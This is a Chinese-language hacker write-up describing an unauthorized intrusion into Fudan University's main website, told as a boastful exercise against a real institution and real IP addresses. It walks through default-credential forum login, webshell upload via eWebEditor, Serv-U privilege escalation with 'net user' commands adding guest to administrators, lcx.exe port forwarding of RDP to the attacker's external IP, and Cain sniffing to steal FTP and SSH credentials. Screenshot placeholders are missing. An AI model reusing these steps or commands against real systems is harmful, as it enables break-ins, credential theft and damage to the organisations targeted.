一、師出有名
某日十分無聊，就和X論壇的超級版主wyzhack瞎吹牛，東年西扯的。后來不知道怎么的扯到復旦去了，他提議說不如我們黑掉復旦吧。正好當時也比較清閑，就答應(yīng)一起看看了，嘿嘿。這次跑去黑復旦純粹是為了練習技術(shù)。
二、戰(zhàn)略部署
這次要拿的是復旦主站，分站可不是我們的目標了，嘿嘿。要不然拿個分站就掛上復旦的名義似乎有點說不過去。通過google順利找到復旦大學主站：http://www.fudan.edu.cn/，

。PHP的程序，打開了個鏈接，順手加個單撇號，提示"警告！提交的數(shù)據(jù)非法！"，又試了幾個其他的注入關(guān)鍵字，都被過濾掉了?？磥碇苯訌闹髡鞠率蛛y度比較大，所以我們得想點其他辦法。這里我打算利用嗅探來獲取目標站的重要信息，嘿嘿。我們都知道可以根據(jù)ping一個目標地址的TTL值來大致判斷對方的服務(wù)器操作系統(tǒng)！我ping了一下復旦主站，發(fā)現(xiàn)TTL值為53，

。這個數(shù)值大致就是Linux的操作系統(tǒng)的了，嘿嘿。要想嗅探就必須要取得與目標服務(wù)器同一網(wǎng)段下的某臺服務(wù)器權(quán)限，然后再安裝嗅探工具進行嗅探攻擊。復旦主站的IP為：61.129.42.5，那我們就必須在61.129.42.*這個網(wǎng)段里先控制一臺服務(wù)器！先用SuperScan3.0掃描整個C段的21端口，作用就是先看看有沒有windows操作系統(tǒng)的服務(wù)器在這個網(wǎng)段里！至于為什么要掃21嘛，大家都清楚要是裝了Serv-U的話要是沒什么意外，提權(quán)應(yīng)該是比較容易的嘛，嘿嘿。掃描結(jié)果出來了，有好幾臺裝有Serv-U的，按經(jīng)驗，裝了Serv-U的就肯定是windows系統(tǒng)的了！IP為61.129.42.42這臺明顯就是windows的系統(tǒng)，Serv-U的版本是6.3的，

。
三、步步為營
現(xiàn)在目的很明確，就是要先控制住61.129.42.42這臺服務(wù)器！在瀏覽器里面填入IP訪問，發(fā)現(xiàn)頁面有點難看，都是些doc文檔下載的東西，對我們來說沒什么用。我們可以通過查詢域名綁定看看有些什么站在上面。我一般不用明小子查詢，因為用它能查出來的已經(jīng)很少了！用X以前介紹過的一個網(wǎng)站來查詢吧，它查出來的比明小子查的數(shù)據(jù)要多且準！打開http://www.seologs.com/ip-...，在"Domain or IP address"里填上"61.129.42.42"，然后點擊"submit"提交，稍等一會就會返回查詢結(jié)果的了，

。只有兩個，似乎不容樂觀哦。居然打開兩個都不能訪問！后來訪問了一下8000端口才有反應(yīng)了，


。光在這里面也看不出什么來，頁面比較簡單，可利用的地方不多。值得慶幸的是有個"在線論壇"，打開看看，原來是動網(wǎng)的，嘿嘿。用默認的用戶名和密碼嘗試登錄，居然成功了進入了后臺，

。本以為可以很輕松的拿到webshell的，沒想到這個破論壇既不能上傳也不能備份！動網(wǎng)沒了這兩個功能基本上比較難拿到webshell了，郁悶！于是又上了邪惡八進制發(fā)帖討論，沒多久就在回復里面看到動網(wǎng)還有個后臺列文件的漏洞！嘿嘿，這回似乎又有得搞了！大致方法就是在"基本設(shè)置"里修改"上傳目錄設(shè)定"，然后到"上傳文件管理"里面去查看結(jié)果。列了N久終于發(fā)現(xiàn)有可利用的東西了，

。ewebeditor出現(xiàn)了，嘿嘿。點擊打開后臺登錄頁面，




嘗試默認的用戶名和密碼發(fā)現(xiàn)無法登錄進去，看來密碼改過了。沒關(guān)系，反正我們能列文件嘛。再利用動網(wǎng)列文件的漏洞找到了ewebeditor的數(shù)據(jù)庫文件，下載回來，用明小子的數(shù)據(jù)庫管理功能打開，查看了管理員密碼的MD5散列，

。再到MD5查詢網(wǎng)站查詢密碼，幸運的是密碼并不復雜，順利查了出來，

。用得到的用戶名和密碼成功登錄了ewebeditor的后臺，

。進了ewebeditor拿webshell就比較輕松的了。樣式管理-拷貝樣式-設(shè)置-添加允許上傳類型asa，再預覽上傳asa后綴的ASP馬，然后在"上傳文件管理"里就可以看到馬的了，點擊直接訪問webshell，



在圖12里面，我們可以看到有ASPNET這個用戶，一般來說很有可能支持ASPX，因為ASPX馬的權(quán)限一般要比ASP的高。所以我上傳了一個ASPX馬。然后再傳了一個SU提權(quán)的ASP馬，執(zhí)行："net user guest /active:yes" "net user guest password" "net localgroup administrators guest /add"三條命令，意思是先激活guest用戶，再給guest用戶設(shè)定一個密碼，再把guest用戶添加進管理員組。幸運的是Serv-U的默認連接密碼沒有改，命令都成功執(zhí)行了。在ASPX馬里執(zhí)行："net user guest"我們可以發(fā)現(xiàn)guest已經(jīng)隸屬于管理員組了，

。用ASPX馬讀取了注冊表的遠程桌面服務(wù)端口，發(fā)現(xiàn)就是默認的3389，不過Terminal Services服務(wù)當時是沒有開的。后來wyzhack放了鴿子才給開了，嘿嘿。
四、守株待兔
直接連接3389是行不通的，防火墻把我們擋在了外面。不過我們可以用lcx.exe給它來個端口轉(zhuǎn)發(fā)。直接用ASPX馬或者SU提權(quán)馬發(fā)現(xiàn)都不能執(zhí)行l(wèi)cx.exe進行轉(zhuǎn)發(fā)，所以我想通過修改Serv-U的配置文件來添加一個具體system權(quán)限的FTP用戶，再登錄上去進行端口轉(zhuǎn)發(fā)。就是修改C:\Program Files\Serv-U\ServUDaemon.ini這個文件的內(nèi)容啦。如何修改我就不廢話了，有興趣的話大家可以去了解下SU配置文件的存放規(guī)則，了解之后修改起來就得心應(yīng)手的了。我就添加了一個用戶名為hackest的，擁有system權(quán)限的FTP用戶。要是配置文件沒有權(quán)限修改的話，可以用SU提權(quán)馬執(zhí)行cacls.exe修改文件屬性為everyone完全控制就可以修改的了，不過cacls.exe需要文件格式為NTFS的才可以使用哦。在CMD下登錄FTP上去，執(zhí)行：
C:\Documents and Settings\All Users\Documents\lcx.exe -slave 219.129.213.252 51 127.0.0.1 3389
本機執(zhí)行：
lcx.exe -listen 51 2007
然后連接本機的的2007端口就可以登錄遠程服務(wù)器了，

。到這里我們就已經(jīng)成功控制了61.129.42.42這臺服務(wù)器。接下來就是安裝cain進行嗅探了，具體請參照我的另一篇關(guān)于嗅探入侵的文章。在61.129.42.42上執(zhí)行"ipconfig /all"命令得知默認網(wǎng)關(guān)為61.129.42.1，

。復旦主站的IP為：61.129.42.5。設(shè)置好cain就可以開始嗅探攻擊了，嘿嘿。由于一開始的那幾天是五一假期時間，嗅了兩天一無所獲。N天之后終于有進展了，wyzhack告訴我已經(jīng)成功嗅探到復旦主站的FTP用戶名和密碼了，


。對于一個網(wǎng)站，有了FTP密碼就等于有了一切！利用FTP上傳了一個PHP馬，進去參觀一下，

。
五、塵埃落定
到這里就已經(jīng)完全控制了復旦大學的主站了！雖然主站的操作系統(tǒng)是Linux，但是我們通過先控制一臺windows的3389肉雞再進行對目標的嗅探攻擊收到了如期的效果?？梢娦崽焦舻耐Φ拇_非比尋常，不注意這方面的防范也必將被人惡意入侵！既然是Linux的系統(tǒng)，管理員一般都是用SSL來遠程管理服務(wù)器的，嘿嘿。掃描一下主站服務(wù)器，發(fā)現(xiàn)開了22端口（SSL的默認連接端口為22）嘗試用嗅到的FTP用戶名和密碼登錄SSL居然成功了，

。至于通過溢出或者其他提權(quán)方法來得到root權(quán)限，我就不弄了，因為這方面實在不太熟悉。本文主要是介紹一種入侵思路，沒有什么技術(shù)含量。不得不說的一句話：管理員們要小心嗅探攻擊了，嗅探的攻擊力可是比較厲害的。如有不妥之處還請大家批評斧正！